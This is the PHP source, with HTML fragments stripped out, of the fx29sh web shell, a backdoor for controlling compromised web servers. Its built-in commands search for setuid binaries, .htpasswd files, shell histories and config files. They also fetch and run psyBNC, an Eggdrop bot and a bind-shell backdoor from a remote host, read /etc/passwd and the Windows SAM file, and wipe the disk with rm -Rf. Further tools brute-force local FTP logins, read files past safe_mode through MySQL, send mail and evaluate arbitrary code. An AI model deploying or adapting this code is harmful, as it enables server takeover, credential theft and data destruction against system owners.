array($sh_mainurl."cyberz.txt","fx29sh.php"), "psyBNC" => array($sh_mainurl."fx.tgz","fx.tgz"), "Eggdrop" => array($sh_mainurl."fxb.tgz","fxb.tgz"), "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"), ); ##[ AUTHENTICATION ]## $auth = array( "login" => "test", "pass" => "test", "md5pass" => "098f6bcd4621d373cade4e832627b4f6", "hostallow" => array("*"), "denied" => "".sh_name().": access denied!", ); ##[ ADVANCED ]## $tmp_dir = ""; $log_email = ""; $sess_cookie = "fx29shcook"; $sort_default = "0a"; #Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending $sort_save = TRUE; #Simpan posisi pengurutan menggunakan cookies. $copy_unset = FALSE; #Hapus file yg telah di-copy setelah dipaste $gzipencode = TRUE; $filestealth = TRUE; #TRUE, tidak merubah waktu modifikasi dan akses. $hexdump_lines = 8; $hexdump_rows = 24; $auto_surl = TRUE; ##[ QUICK COMMANDS ]## if (!is_windows()) { #Unix $cmdaliases = array( array("List Directory", "ls -al"), array("Find all suid files", "find / -type f -perm -04000 -ls"), array("Find suid files in current dir", "find . -type f -perm -04000 -ls"), array("Find all sgid files", "find / -type f -perm -02000 -ls"), array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"), array("Find files", "find / -type f -name"), array("Find config* files", "find / -type f -name \"config*\""), array("Find config* files in current dir", "find . -type f -name \"config*\""), array("Find all writable folders and files", "find / -perm -2 -ls"), array("Find all writable folders and files in current dir", "find . -perm -2 -ls"), array("Find all writable folders", "find / -type d -perm -2 -ls"), array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"), array("Find all service.pwd files", "find / -type f -name service.pwd"), array("Find service.pwd files in current dir", "find . -type f -name service.pwd"), array("Find all .htpasswd files", "find / -type f -name .htpasswd"), array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"), array("Find all .bash_history files", "find / -type f -name .bash_history"), array("Find .bash_history files in current dir", "find . -type f -name .bash_history"), array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), array("List file attributes on a Linux second extended file system", "lsattr -va"), array("Show opened ports", "netstat -an | grep -i listen"), array("-----",""), array("Logged in users","w"), array("Last connect","lastlog"), array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"), array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"), array("Inet Address","/sbin/ifconfig | grep inet"), array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"), array("Downloaders?","which wget curl w3m lynx fetch lwp-download"), array("CPU Info","cat /proc/version /proc/cpuinfo"), array("Is gcc installed ?","locate gcc"), array("Format box (DANGEROUS)","rm -Rf"), array("-----",""), array("wget & run psyBNC","wget ".$sh_sourcez["psyBNC"][0].";tar -zxf ".$sh_sourcez["psyBNC"][1].";cd .fx;./config 29110;./fuck;./run"), array("wget & extract EggDrop","wget ".$sh_sourcez["Eggdrop"][0].";tar -zxf ".$sh_sourcez["psyBNC"][1]), array("wget & run BindDoor","wget ".$sh_sourcez["BindDoor"][0].";tar -zxvf ".$sh_sourcez["BindDoor"][1].";./bind"), array("-----",""), array("wget RatHole 1.2 (Linux & BSD)","wget"), ); } else { #Windows $cmdaliases = array( array("List Directory", "dir"), array("Find index.php in current dir", "dir /s /w /b index.php"), array("Find *config*.php in current dir", "dir /s /w /b *config*.php"), array("Find c99shell in current dir", "find /c \"c99\" *"), array("Find r57shell in current dir", "find /c \"r57\" *"), array("Find fx29shell in current dir", "find /c \"fx29\" *"), array("Show active connections", "netstat -an"), array("Show running services", "net start"), array("User accounts", "net user"), array("Show computers", "net view"), ); } ##[ PHP FILESYSTEM (By FaTaLisTiCz_Fx) ]## $phpfsaliases = array( array("Read File", "read", 1, "File", ""), array("Write File (PHP5)", "write", 2, "File","Text"), array("Copy", "copy", 2, "From", "To"), array("Rename/Move", "rename", 2, "File", "To"), array("Delete", "delete", 1 ,"File", ""), array("Make Dir","mkdir", 1, "Dir", ""), array("Download", "download", 2, "URL", "To"), array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"), array("Change Perm (0755)", "chmod", 2, "File", "Perms"), array("Find Writable Dir", "fwritabledir", 2 ,"Dir", "Max"), array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"), ); ############################# ##[ END OF CONFIGURATIONS ]## ############################# define("starttime", getmicrotime()); @set_time_limit(0); @ini_set("max_execution_time",0); @ignore_user_abort(TRUE); @set_magic_quotes_runtime(0); if (get_magic_quotes_gpc()) { strips($GLOBALS); } $_REQUEST = array_merge($_COOKIE, $_GET, $_POST); $d = @$_REQUEST["d"]; $f = @$_REQUEST["f"]; @extract($_REQUEST["fx29shcook"]); foreach ($_REQUEST as $k => $v) { if (!isset($$k)) { $$k = $v; } #Converting request to variable } ##[ SELF URL ]## if ($auto_surl) { $include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) { $v = explode("=",$v); $name = urldecode($v[0]); $value = @urldecode($v[1]); $needles = array("http://","https://","ssl://","ftp://","\\\\"); foreach ($needles as $needle) { if (strpos($value,$needle) === 0) { $includestr .= urlencode($name)."=".urlencode($value)."&"; } } } } if (empty($surl)) { $surl = htmlspecialchars("?".@$includestr); } ##[ QUICK LAUNCH ]## $quicklaunch = array( array("\"Home\"",$surl), array("\"Back\"","#\" onclick=\"history.back(1)"), array("\"Forward\"","#\" onclick=\"history.go(1)"), array("\"Up\"",$surl."act=ls&d=%upd&sort=%sort"), array("\"Search\"",$surl."act=search&d=%d"), array("\"Buffer\"",$surl."act=fsbuff&d=%d"), array("\"About\"",$surl."act=about"), array("-",""), array("Security",$surl."act=security&d=%d"), array("Processes",$surl."act=processes&d=%d"), array("MySQL",$surl."act=sql&d=%d"), array("Eval",$surl."act=eval&d=%d"), array("Encoder",$surl."act=encoder&d=%d"), array("Mailer",$surl."act=fxmailer"), array("Toolz",$surl."act=tools&d=%d"), array("milw0rm",milw0rm()), array("Md5 Lookup",""), array("Images",$surl."act=img&img=listall"), array("Feedback",$surl."act=feedback"), array("Update",$surl."act=update"), array("Kill Shell",$surl."act=selfremove") ); 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FTP Brute",$surl."act=ftpquickbrute&d=%d"); } ##[ FILE TYPES ]## $ftypes = array( "html" => array("html","htm","shtml"), "txt" => array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), "exe" => array("sh","install","bat","cmd","sys","com"), "ini" => array("ini","inf","conf"), "code" => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), "img" => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), "sdb" => array("sdb"), "phpsess" => array("sess"), "download" => array("exe","com","sys","pif","src","lnk","zip","rar","gz","tar","pdf") ); $exeftypes = array( "php -q %f%" => array("php","php3","php4"), "perl %f%" => array("pl","cgi") ); $regxp_highlight = array( array(basename($_SERVER["PHP_SELF"]),1,"",""), array("\.tgz$",1,"",""), array("\.gz$",1,"",""), array("\.tar$",1,"",""), array("\.bz2$",1,"",""), array("\.zip$",1,"",""), array("\.rar$",1,"",""), array("\.php$",1,"",""), array("\.php3$",1,"",""), array("\.php4$",1,"",""), array("\.jpg$",1,"",""), array("\.jpeg$",1,"",""), array("\.JPG$",1,"",""), array("\.JPEG$",1,"",""), array("\.ico$",1,"",""), array("\.gif$",1,"",""), array("\.png$",1,"",""), array("\.htm$",1,"",""), array("\.html$",1,"",""), array("\.txt$",1,"",""), array("\.pdf$",1,"","") ); ##[ HIGHLIGHT CODE ]## $highlight_bg = "#E0E0E0"; $highlight_comment = "#FF6600"; $highlight_default = "#000080"; $highlight_html = "#1300FF"; $highlight_keyword = "#007700"; $highlight_string = "#FF0000"; @ini_set("",$highlight_bg); @ini_set("highlight.comment",$highlight_comment); @ini_set("highlight.default",$highlight_default); @ini_set("highlight.html",$highlight_html); @ini_set("highlight.keyword",$highlight_keyword); @ini_set("highlight.string",$highlight_string); ############################# ##[ END OF CONFIGURATIONS ]## ############################# #################### ##[ AUTHENTICATE ]## #################### foreach ($auth["hostallow"] as $k => $v) { $tmp[] = str_replace("\\*",".*",preg_quote($v)); } $s = "!^(".implode("|",$tmp).")$!i"; if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) { exit("".sh_name()."ACCESS DENIED! Your host (".getenv("REMOTE_ADDR").") not allowed!"); } if (!empty($auth["login"])) { if (empty($auth["md5pass"])) { $auth["md5pass"] = md5($auth["pass"]); } if (($_SERVER["PHP_AUTH_USER"] != $auth["login"]) or (md5($_SERVER["PHP_AUTH_PW"]) != $auth["md5pass"])) { header("WWW-Authenticate: Basic realm=\"".sh_name().": Restricted Area\""); header("HTTP/1.0 401 Unauthorized"); die($auth["denied"]); } } ############### ##[ ACTIONS ]## ############### if (!isset($act)) { $act = ""; } if ($act == "img") { @ob_clean(); $images = imagez(); $imgequals = array( "ext_tar" => array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), "ext_php" => array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), "ext_cpp" => array("ext_c"), "ext_jpg" => array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), "ext_html" => array("ext_html","ext_htm"), "ext_avi" => array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), "ext_lnk" => array("ext_lnk","ext_url"), "ext_ini" => array("ext_ini","ext_css","ext_inf","ext_conf"), "ext_doc" => array("ext_doc","ext_dot","ext_xls","ext_pdf"), "ext_js" => array("ext_js","ext_vbs"), "ext_cmd" => array("ext_cmd","ext_bat","ext_pif","ext_com"), "ext_wri" => array("ext_wri","ext_rtf"), "ext_txt" => array("ext_txt","ext_lng"), "ext_swf" => array("ext_swf","ext_fla"), "ext_mp3" => array("ext_mp3","ext_au","ext_midi","ext_mid","ext_wav"), "ext_htaccess" => array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") ); #Show all available images if ($img == "listall") { foreach ($imgequals as $a=>$b) { foreach ($b as $d) { if ( ($a != $d) && (!empty($images[$d])) ) { echo("Warning! Remove \$images[".$d."]
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\n"; echo "\t\t
IP Address: "> You: ">
\n"; echo (isset($safemodeexecdir)) ? "\n\t\t\tSafemodeExecDir: ".$safemodeexecdir."
" : ""; echo (showdisfunc()) ? "\t\t\tDisFunc: ".showdisfunc() : ""; echo "\n"; ?>
\n"; } else { $item[1] = str_replace("%d",urlencode($d),$item[1]); $item[1] = str_replace("%sort",$sort,$item[1]); $v = realpath($d.".."); if (empty($v)) { $a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a); } $item[1] = str_replace("%upd",urlencode($v),$item[1]); echo "\t\t\t".$item[0]."\n"; } } ?>
".htmlspecialchars($b).DIRECTORY_SEPARATOR."\n"; $i++; } echo "\t\t\t"; echo (is_writable($d)) ? "".view_perms_color($d)."" : "".view_perms_color($d).""; echo "\n"; ?>
.: SQL Manager (Under Construction) :.
"; if (count($sqlquicklaunch) > 0) { foreach($sqlquicklaunch as $item) { echo "[ ".$item[0]." ] "; } } } ?>
"; } ?>

".htmlspecialchars($sql_db)." ]=-

\n"; $c = 0; while ($row = mysql_fetch_array($result)) { $count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "\t+ ".htmlspecialchars($row[0])." (".$count_row[0].")
\n"; mysql_free_result($count); $c++; } if (!$c) { echo "No tables found in database"; } } } ?>
There are ".$c." table(s) in database: ".htmlspecialchars($sql_db).""; if (count(@$dbquicklaunch) > 0) { foreach($dbsqlquicklaunch as $item) { echo "[ ".$item[0]." ] "; } } echo "\n"; $acts = array("","dump"); if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} elseif ($sql_tbl_act == "insert") { if ($sql_tbl_insert_radio == 1) { $keys = ""; $akeys = array_keys($sql_tbl_insert); foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} $values = ""; $i = 0; foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; $sql_act = "query"; $sql_tbl_act = "browse"; } elseif ($sql_tbl_insert_radio == 2) { $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; $result = mysql_query($sql_query) or print(mysql_smarterror()); $result = mysql_fetch_array($result, MYSQL_ASSOC); $sql_act = "query"; $sql_tbl_act = "browse"; } } if ($sql_act == "query") { echo "
"; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
";} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) { echo "
"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "

"; } } if (in_array($sql_act,$acts)) { ?>
Create new table:
Dump DB:
"; } if ($sql_act == "newtbl") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) { echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
"; } else { echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
Reason: ".mysql_smarterror(); } } elseif ($sql_act == "dump") { if (empty($submit)) { $diplay = FALSE; echo "

"; echo "DB:

"; $v = join (";",$dmptbls); echo "Only tables (explode \";\") 1:

"; if ($dump_file) {$tmp = $dump_file;} else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} echo "File:

"; echo "Download:

"; echo "Save to file: "; echo "

1 - all, if empty"; echo "
"; } else { $diplay = TRUE; $set = array(); $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "download"; $set["print"] = 0; $set["nl2br"] = 0; $set[""] = 0; $set["file"] = $dump_file; $set["add_drop"] = TRUE; $set["onlytabs"] = array(); if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} $ret = mysql_dump($set); if ($sql_dump_download) { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($ret)); header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); echo $ret; exit; } elseif ($sql_dump_savetofile) { $fp = fopen($sql_dump_file,"w"); if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} else { fwrite($fp,$ret); fclose($fp); echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; } } else {echo "Dump: nothing to do!";} } } if ($diplay) { if (!empty($sql_tbl)) { if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); $count_row = mysql_fetch_array($count); mysql_free_result($count); $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); $tbl_struct_fields = array(); while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} if (@$sql_ls > @$sql_le) { $sql_le = $sql_ls + $perpage; } if (empty($sql_tbl_page)) { $sql_tbl_page = 0; } if (empty($sql_tbl_ls)) { $sql_tbl_ls = 0; } if (empty($sql_tbl_le)) { $sql_tbl_le = 30; } $perpage = $sql_tbl_le - $sql_tbl_ls; if (!is_numeric($perpage)) { $perpage = 10; } $numpages = $count_row[0]/$perpage; $e = explode(" ",$sql_order); if (count($e) == 2) { if ($e[0] == "d") { $asc_desc = "DESC"; } else { $asc_desc = "ASC"; } $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; } else {$v = "";} $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; $result = mysql_query($query) or print(mysql_smarterror()); echo "
Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
"; echo "[ Structure ]   "; echo "[ Browse ]   "; echo "[ Dump ]   "; echo "Insert ]   "; if ($sql_tbl_act == "structure") { echo "Under construction!"; } if ($sql_tbl_act == "insert") { if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} if (!empty($sql_tbl_insert_radio)) { echo "Under construction!"; } else { echo "

Inserting row into table:
"; if (!empty($sql_tbl_insert_q)) { $sql_query = "SELECT * FROM `".$sql_tbl."`"; $sql_query .= " WHERE".$sql_tbl_insert_q; $sql_query .= " LIMIT 1;"; $result = mysql_query($sql_query,$sql_sock) or print("

".mysql_smarterror()); $values = mysql_fetch_assoc($result); mysql_free_result($result); } else {$values = array();} echo "
"; foreach ($tbl_struct_fields as $field) { $name = $field["Field"]; if (empty($sql_tbl_insert_q)) {$v = "";} echo ""; $i++; } echo "

"; echo "Insert as new row"; if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} echo "

"; } } if ($sql_tbl_act == "browse") { $sql_tbl_ls = abs($sql_tbl_ls); $sql_tbl_le = abs($sql_tbl_le); echo "
"; echo "\"Pages\" "; $b = 0; for($i=0;$i<$numpages;$i++) { if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} echo $i; if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} if (($i/30 == round($i/30)) and ($i > 0)) {echo "
";} else { echo " "; } } if ($i == 0) {echo "empty";} echo "
From: To:
"; echo "
\n"; echo ""; echo ""; for ($i=0;$i"; if (empty($e[0])) {$e[0] = "a";} if (@$e[1] != $v) {echo "".$v."";} else {echo "".$v."\"".$m."\"";} echo ""; } echo ""; echo ""; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { echo ""; $w = ""; $i = 0; foreach ($row as $k=>$v) { $name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++; } if (count($row) > 0) { $w = substr($w,0,strlen($w)-3); } echo ""; $i = 0; foreach ($row as $k=>$v) { $v = htmlspecialchars($v); if ($v == "") { $v = "NULL"; } echo ""; $i++; } echo ""; echo ""; } mysql_free_result($result); echo "
".$v.""; echo "Delete "; echo "Edit "; echo "


"; } } else { $result = mysql_query("SHOW TABLE STATUS", $sql_sock); if (!$result) { echo mysql_smarterror(); } else { ?>
\n". "\t\t\n"; ?>
"> "> ">Empty ">Drop ">Insert
+$i table(s)$trows$row[1]$row[10]$row[11]".view_size($tsize)."
Create new DB:
View File:
"; if ($sql_act == "newdb") { echo ""; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
";} else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
".mysql_smarterror();} } if ($sql_act == "serverstatus") { $result = mysql_query("SHOW STATUS", $sql_sock); echo "
Server-status variables:

"; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} echo "
"; mysql_free_result($result); } if ($sql_act == "servervars") { $result = mysql_query("SHOW VARIABLES", $sql_sock); echo "
Server variables:

"; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} echo "
"; mysql_free_result($result); } if ($sql_act == "processes") { if (!empty($kill)) { $query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Process #".$kill." was killed."; } $result = mysql_query("SHOW PROCESSLIST", $sql_sock); echo "

"; echo ""; while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} echo "
"; mysql_free_result($result); } if ($sql_act == "getfile") { $tmpdb = $sql_login."_tmpdb"; $select = mysql_select_db($tmpdb); if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} if ($select) { $created = FALSE; mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $result = mysql_query("SELECT * FROM tmp_file;"); if (!$result) {echo "Error in reading file (permision denied)!";} else { for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
";} else {echo "File \"".$sql_getfile."\":
";} mysql_free_result($result); mysql_query("DROP TABLE tmp_file;"); } } mysql_drop_db($tmpdb); } } } } ?>
Affected rows: $affected
\n"; echo ".: Ftp Quick Brute :."; echo ""; if (!empty($submit)) { if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} $fp = fopen("/etc/passwd","r"); if (!$fp) {echo "Can't get /etc/passwd for password-list.";} else { if ($fqb_logging) { if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} else {$fqb_logfp = FALSE;} $fqb_log = "FTP Quick Brute (".sh_name().") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} } @ob_flush(); $i = $success = 0; $ftpquick_st = getmicrotime(); while(!feof($fp)) { $str = explode(":",fgets($fp,2048)); if (fx29ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) { echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
"; $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} $success++; ob_flush(); } if ($i > $fqb_lenght) {break;} $i++; } if ($success == 0) { echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n"; } $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); echo "
Total time (secs.): ".$ftpquick_t."
Total connections: ".$i."
Success.: ".$success."
Connects per second: ".round($i/$ftpquick_t,2)."
"; $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} if ($fqb_logemail) {@mail($fqb_logemail,"".sh_name()." report",$fqb_log);} fclose($fqb_logfp); } } else { $logfile = $tmp_dir."fx29sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); echo "
\n". "\n". "Read first:". " Users only with shell". "Logging". "Logging to file:". "Logging to e-mail:". "
"; } echo ""; } ##[ SECURITY ]## if ($act == "security") { ?>
.: Server Security Information :.
\n"; } } if (!is_windows()) { dispsecinfo("OS Version",fx29exec("cat /proc/version")); dispsecinfo("Kernel Version",fx29exec("sysctl -a | grep version")); dispsecinfo("Distrib Name",fx29exec("cat /etc/")); dispsecinfo("Distrib Name (2)",fx29exec("cat /etc/*-realise")); dispsecinfo("CPU Info",fx29exec("cat /proc/cpuinfo")); dispsecinfo("RAM",fx29exec("free -m")); dispsecinfo("HDD Space",fx29exec("df -h")); dispsecinfo("List of Attributes",fx29exec("lsattr -a")); dispsecinfo("Mount Options",fx29exec("cat /etc/fstab")); dispsecinfo("lynx installed?",fx29exec("which lynx")); dispsecinfo("links installed?",fx29exec("which links")); dispsecinfo("GET installed?",fx29exec("which GET")); dispsecinfo("Where is Apache?",fx29exec("whereis apache")); dispsecinfo("Where is perl?",fx29exec("whereis perl")); dispsecinfo("Locate proftpd.conf",fx29exec("locate proftpd.conf")); dispsecinfo("Locate httpd.conf",fx29exec("locate httpd.conf")); dispsecinfo("Locate my.conf",fx29exec("locate my.conf")); dispsecinfo("Locate psybnc.conf",fx29exec("locate psybnc.conf")); } else { dispsecinfo("OS Version",fx29exec("ver")); dispsecinfo("Account Settings",fx29exec("net accounts")); dispsecinfo("User Accounts",fx29exec("net user")); } echo "
Open Base Dir
Password File *nix /etc/passwd:
From: To:

".$uid["dir"].""; echo "\t\t".join(":",$uid)."
\n"; } $i++; } } else { echo "\tView /etc/passwd\n"; } } else { $v = $_SERVER["WINDIR"].'\repair\sam'; if (file_get_contents($v)) { echo "\tDownload password file\n"; } } ?>
Config Files ".$sec_arr[0]." ]\n"; } } ?>
".$name."\n". "
\n". "\t
\n"; } ##[ MAKE FILE ]## if ($act == "mkfile") { if ($mkfile != $d) { if ($overwrite == 0) { if (file_exists($mkfile)) { echo "FILE EXIST: $overwrite ".htmlspecialchars($mkfile); } } else { if (!fopen($mkfile,"w")) { echo "ACCESS DENIED: ".htmlspecialchars($mkfile); } else { $act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; } $f = basename($mkfile); } } } else { disp_error("Enter filename!"); } } ##[ ENCODER ]## if ($act == "encoder") { if (!isset($encoder_input)) { $encoder_input = ""; } ?>
\n". "\t\t
.: Encoder :.
Hashes: :
Url: urlencode:
Base64: base64_encode:
base64_decode: "; } else { $rows++; echo ""; } echo " [Send to input]\n"; } echo "\t\t
Base convertations:dec2hex". "\n"; ?>
Buffer is empty!
";} else { $fx_infohead = "File-System Buffer"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls"; } } ##[ SELF REMOVE ]## if ($act == "selfremove") { ?>
Are you sure want to remove this shell ?

For confirmation, enter ""

Thanks for your feedback! Your ticket ID: ".$ticket."."; } else { ?>
.: Feedback or report bug () :.
Your name:
Your e-mail:
Attach Server info (Recommended for bug-fix)
.: Mailer :.
Email sent to $dest_email!"; } else { disp_error("Can't send email!"); } } else { ?>
Your name:
Your e-mail:
.: Filesystem Search :.
@$search_name, "name_regexp" => @$search_name_regexp, "text" => @$search_text, "text_regexp" => @$search_text_regxp, "text_wwo" => @$search_text_wwo, "text_cs" => @$search_text_cs, "text_not" => @$search_text_not ); $searchtime = getmicrotime(); $in = array_unique(explode(";",$search_in)); foreach($in as $v) { fx29fsearch($v); } $searchtime = round(getmicrotime()-$searchtime,4); if (count($found) == 0) { echo "No files found!"; } else { $ls_arr = $found; $disp_fullpath = TRUE; $act = "ls"; } } ?>
File or folder Name: > Regular Expression
Look in (Separate by ";"):
A word or phrase in the file:
> Regular Expression > Whole words only > Case sensitive > Find files NOT containing the text
\n". "
\n"; } } ##[ CHMOD]## if ($act == "chmod") { $mode = fileperms($d.$f); if (!$mode) {echo "Change file-mode with error: can't get current value.";} else { $form = TRUE; if ($chmod_submit) { $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); if (chmod($d.$f,$octet)) { $act = "ls"; $form = FALSE; $err = ""; } else {$err = "Can't chmod to ".$octet.".";} } if ($form) { $perms = parse_perms($mode); echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")\n". "
".($err?"Error: ".$err:"")."\n". "
\n". "\n". "\n". "\n". "\n". "\n". "\n". "\n". "\n". "\n". "

\n". " Read
\n". " Write
\n". " eXecute

\n". " Read
\n". " Write
\n". " eXecute

\n". " Read
\n". " Write
\n". " eXecute
\n". "
